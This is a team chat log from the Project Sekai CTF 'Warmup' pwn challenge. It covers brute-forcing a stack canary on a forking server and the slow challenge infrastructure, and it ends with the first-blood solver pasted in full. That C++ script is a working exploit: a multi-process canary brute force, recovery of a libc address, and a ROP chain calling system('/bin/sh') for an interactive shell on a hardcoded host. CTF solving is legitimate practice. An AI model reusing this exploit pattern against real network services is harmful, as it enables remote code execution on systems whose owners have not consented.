Project Sekai - 🩸-pwn-warmup

Warmup - 1000 points

Category: Pwn Description: Let's Warm up a little bit nc 35.189.210.103 17012 Files:

Tags: No tags.

Sutx pinned a message to this channel. 07/07/2023 10:58 PM

@nyancat0131 wants to collaborate

23:03

@Surg wants to collaborate

canary brute force.

@Zafirr wants to collaborate

dead.

00:59

00:59

remote dead.

brute force will take long.

01:09

i solved it on local

01:09

i even rented gce near the server

01:09

but still slow

if its too slow maybe need to ticket and tell them its fucking slow

i dont like this ctf already

01:30

i have only managed to get 1/2 of the canary

01:30

and even after that i have to brute 4.5 more bytes of the libc

01:30

my god

i recall piers doing 16 multi threads brute on some pwn only he solved msfrog

01:31

2^32 brute or sth

01:31

so slow

this one is just 256 * 11.5

oh

01:31

multithread then, ez

it's faster now

01:35

seems not many teams trying to brute it

01:35

the timeout is 1 hr.

01:36

i hope i can get it without coding multithread

01:36

multithread=span 8 solve.py msfrog

need to sync tho

01:36

cuz it's not like pinning one offset

its not like bruting address?

01:36

ah ok

it's byte-by-byte brute cuz it uses fork

ic

lol the server is so slow

02:00

i think because so many ppl try to multithread it

02:00

now my single connection struggles to even send data

infra is just broken i think

02:00

v2 has also been down

02:00

for like 20 minutes

they should not build brute force chall if they don't know about scaling.

02:01

that's y hacker should also learn software dev.

02:01

their captain is quite young (edited)

02:01

still 18/19 i think

server seems dead to me...

02:13

old instance is dead

02:13

and i cannot spawn new connection either

02:14

it seems like they run out of port

ip changed

02:25

34.76.152.107

02:25

to that

@Violin wants to collaborate

its rebooted, conn seems to work now

okay i'm using 4 threads for canary

nyancat0131

used /ctf submit

Well done, you got first blood!

shitty challenge i must say

nice

nyancat0131

shitty challenge i must say

What was your final script

#include "framework.h"
#include <vector>
#include <thread>
#include <sys/mman.h>
#include <utility>

static constexpr char host[] = "34.76.152.107";

int *shared;

void canary(std::string payload, int port, int l, int r) {
    payload.push_back('\x00');
    for (int j = l; j < r && *shared == -1; ++j) {
        payload.back() = j;
        auto rr = TCPSocket(host, port);
        rr.Send(payload);
        rr.RecvLine();
        try {
            rr.RecvLine();
        } catch(...) {
            *shared = j;
            break;
        }
    }
    exit(0);
}

int main() {
    auto r = TCPSocket(host, 17012);
    r.RecvUntil("port ");
    int port = atoi(r.RecvUntil(" ").c_str());

    std::string payload(57, '\x00');
    for (int i = 0; i < 7; ++i) {
        LogVar(i);
        shared = reinterpret_cast<int *>(mmap(nullptr, sizeof(int), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0));
        *shared = -1;
        pid_t p[4];
        p[0] = fork();
        if (p[0] == 0) canary(payload, port, 0, 64);
        p[1] = fork();
        if (p[1] == 0) canary(payload, port, 64, 128);
        p[2] = fork();
        if (p[2] == 0) canary(payload, port, 128, 192);
        p[3] = fork();
        if (p[3] == 0) canary(payload, port, 192, 256);
        while (*shared == -1) sleep(0);
        payload.push_back(*shared);
    }    

    payload.resize(payload.size() + 8);
    payload.push_back('\x76');

    for (int i = 0; i < 4; ++i) {
        LogVar(i);
        payload.push_back('\x00');
        int start = 0, step = 1;
        if (i == 0) {
            start = 0xA;
            step = 0x10;
        }
        for (int j = start; j < 256; j += step) {
            payload.back() = j;
            auto rr = TCPSocket(host, port);
            rr.Send(payload);
            rr.RecvLine();
            try {
                if (rr.RecvLine()[0] == 'T') {
                    break;
                }
            } catch(...) {
            }
        }
    }

    payload.push_back('\x7f');
    payload.push_back('\x00');
    payload.push_back('\x00');

    auto libc = Unpack<uint64_t>(payload.substr(72)) - 0x23a76;
    LogHex(libc);

    payload.resize(payload.size() - 8);
    payload += Pack(libc + 0x22fd9); // ret
    payload += Pack(libc + 0x240e5); // pop rdi ; ret
    payload += Pack(libc + 0x1B51D2); // /bin/sh
    payload += Pack(libc + 0x4EBF0); // system
    
    HexDump(payload);
    auto rr = TCPSocket(host, port);
    rr.Send(payload);
    rr.Interactive();
}

02:44

i use c++ but should translate to python pretty the same

damn c++ pwn script

02:45

thats rare

Bouta say

share framework.h?

damn c++ solve

But multithreading just... is awful in python

message.txt

9.44 KB

In the sense that you cant.

it's still evolving though.

02:46

so it's not the final version of my framework

"Warmup"

fork() is just too nice under linux.